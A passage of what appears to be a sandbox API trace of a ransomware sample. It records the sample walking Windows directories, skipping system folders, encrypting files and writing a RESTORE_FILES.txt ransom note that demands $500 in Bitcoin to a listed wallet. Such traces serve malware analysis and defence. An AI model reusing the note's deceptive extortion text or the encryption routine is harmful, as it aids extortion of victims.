lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.739] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.739] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.739] CloseHandle (hObject=0xac) returned 1 [0044.739] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.739] lstrcmpiW (lpString1="zh-TW", lpString2="Windows") returned 1 [0044.739] lstrcmpiW (lpString1="zh-TW", lpString2="Program Files") returned 1 [0044.739] lstrcmpiW (lpString1="zh-TW", lpString2="Program Files (x86)") returned 1 [0044.739] lstrcmpiW (lpString1="zh-TW", lpString2="$Recycle.bin") returned 1 [0044.739] lstrcmpiW (lpString1="zh-TW", lpString2="System Volume Information") returned 1 [0044.739] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0044.739] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0044.739] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0044.739] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\*") returned 19 [0044.739] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.739] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.739] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.739] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.739] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.739] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.739] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\.") returned 19 [0044.739] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.739] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.740] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.740] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.740] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.740] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.740] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.740] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\..") returned 20 [0044.740] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.740] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.740] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.740] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.740] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.740] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.740] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.740] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.740] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0044.740] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.740] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.740] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.740] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.740] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.740] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.740] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.740] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\RESTORE_FILES.txt") returned 35 [0044.740] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\RESTORE_FILES.txt" (normalized: "c:\\boot\\zh-tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.740] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.740] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.741] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.741] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.741] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.741] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.741] CloseHandle (hObject=0xac) returned 1 [0044.741] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0044.741] FindClose (in: hFindFile=0x447b60 | out: hFindFile=0x447b60) returned 1 [0044.741] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\RESTORE_FILES.txt") returned 29 [0044.741] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\RESTORE_FILES.txt" (normalized: "c:\\boot\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0044.742] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.742] WriteFile (in: hFile=0xa0, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0044.742] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.742] WriteFile (in: hFile=0xa0, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0044.743] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.743] WriteFile (in: hFile=0xa0, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, lpOverlapped=0x0) returned 1 [0044.743] CloseHandle (hObject=0xa0) returned 1 [0044.743] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.743] lstrcmpiW (lpString1="bootmgr", lpString2="Windows") returned -1 [0044.743] lstrcmpiW (lpString1="bootmgr", lpString2="Program Files") returned -1 [0044.743] lstrcmpiW (lpString1="bootmgr", lpString2="Program Files (x86)") returned -1 [0044.743] lstrcmpiW (lpString1="bootmgr", lpString2="$Recycle.bin") returned 1 [0044.743] lstrcmpiW (lpString1="bootmgr", lpString2="System Volume Information") returned -1 [0044.743] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0044.743] StrStrIW (lpFirst="bootmgr", lpSrch=".protected") returned 0x0 [0044.743] lstrcmpW (lpString1="bootmgr", lpString2="RESTORE_FILES.txt") returned -1 [0044.743] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f87c | out: pbBuffer=0x295f87c) returned 1 [0044.743] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f8a4*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f8a4*=0x30) returned 1 [0044.744] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.744] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.744] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Windows") returned -1 [0044.744] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Program Files") returned -1 [0044.744] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="Program Files (x86)") returned -1 [0044.744] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="$Recycle.bin") returned 1 [0044.744] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="System Volume Information") returned -1 [0044.744] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0044.744] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch=".protected") returned 0x0 [0044.744] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="RESTORE_FILES.txt") returned -1 [0044.744] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f87c | out: pbBuffer=0x295f87c) returned 1 [0044.744] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f8a4*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f8a4*=0x30) returned 1 [0044.744] CreateFileW (lpFileName="\\\\?\\C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.745] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.745] lstrcmpiW (lpString1="Config.Msi", lpString2="Windows") returned -1 [0044.745] lstrcmpiW (lpString1="Config.Msi", lpString2="Program Files") returned -1 [0044.745] lstrcmpiW (lpString1="Config.Msi", lpString2="Program Files (x86)") returned -1 [0044.745] lstrcmpiW (lpString1="Config.Msi", lpString2="$Recycle.bin") returned 1 [0044.745] lstrcmpiW (lpString1="Config.Msi", lpString2="System Volume Information") returned -1 [0044.745] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi") returned 17 [0044.745] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0044.745] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0044.746] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Config.Msi\\*") returned 19 [0044.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x447b60 [0044.746] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.746] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.746] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.746] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.746] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.746] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\.") returned 19 [0044.746] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.746] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0044.746] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0044.746] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.746] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.746] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\." (normalized: "c:\\config.msi\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.746] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.746] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.746] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.746] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.746] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.746] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.746] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\..") returned 20 [0044.746] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.746] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.746] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0044.746] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0044.746] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.747] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.747] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.747] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0044.747] FindClose (in: hFindFile=0x447b60 | out: hFindFile=0x447b60) returned 1 [0044.747] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Config.Msi\\RESTORE_FILES.txt") returned 35 [0044.747] CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\RESTORE_FILES.txt" (normalized: "c:\\config.msi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0044.747] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.747] WriteFile (in: hFile=0xa0, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0044.748] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.748] WriteFile (in: hFile=0xa0, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0044.748] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.748] WriteFile (in: hFile=0xa0, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, lpOverlapped=0x0) returned 1 [0044.748] CloseHandle (hObject=0xa0) returned 1 [0044.748] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.748] lstrcmpiW (lpString1="Documents and Settings", lpString2="Windows") returned -1 [0044.748] lstrcmpiW (lpString1="Documents and Settings", lpString2="Program Files") returned -1 [0044.748] lstrcmpiW (lpString1="Documents and Settings", lpString2="Program Files (x86)") returned -1 [0044.748] lstrcmpiW (lpString1="Documents and Settings", lpString2="$Recycle.bin") returned 1 [0044.748] lstrcmpiW (lpString1="Documents and Settings", lpString2="System Volume Information") returned -1 [0044.748] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0044.748] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0044.748] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0044.748] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Documents and Settings\\*") returned 31 [0044.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0xffffffff [0044.749] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.749] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Windows") returned -1 [0044.749] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Program Files") returned -1 [0044.749] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Program Files (x86)") returned -1 [0044.749] lstrcmpiW (lpString1="hiberfil.sys", lpString2="$Recycle.bin") returned 1 [0044.749] lstrcmpiW (lpString1="hiberfil.sys", lpString2="System Volume Information") returned -1 [0044.749] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0044.749] StrStrIW (lpFirst="hiberfil.sys", lpSrch=".protected") returned 0x0 [0044.749] lstrcmpW (lpString1="hiberfil.sys", lpString2="RESTORE_FILES.txt") returned -1 [0044.749] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f87c | out: pbBuffer=0x295f87c) returned 1 [0044.749] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f8a4*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f8a4*=0x30) returned 1 [0044.749] CreateFileW (lpFileName="\\\\?\\C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.749] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0044.749] lstrcmpiW (lpString1="MSOCache", lpString2="Windows") returned -1 [0044.749] lstrcmpiW (lpString1="MSOCache", lpString2="Program Files") returned -1 [0044.749] lstrcmpiW (lpString1="MSOCache", lpString2="Program Files (x86)") returned -1 [0044.749] lstrcmpiW (lpString1="MSOCache", lpString2="$Recycle.bin") returned 1 [0044.749] lstrcmpiW (lpString1="MSOCache", lpString2="System Volume Information") returned -1 [0044.750] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache") returned 15 [0044.750] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 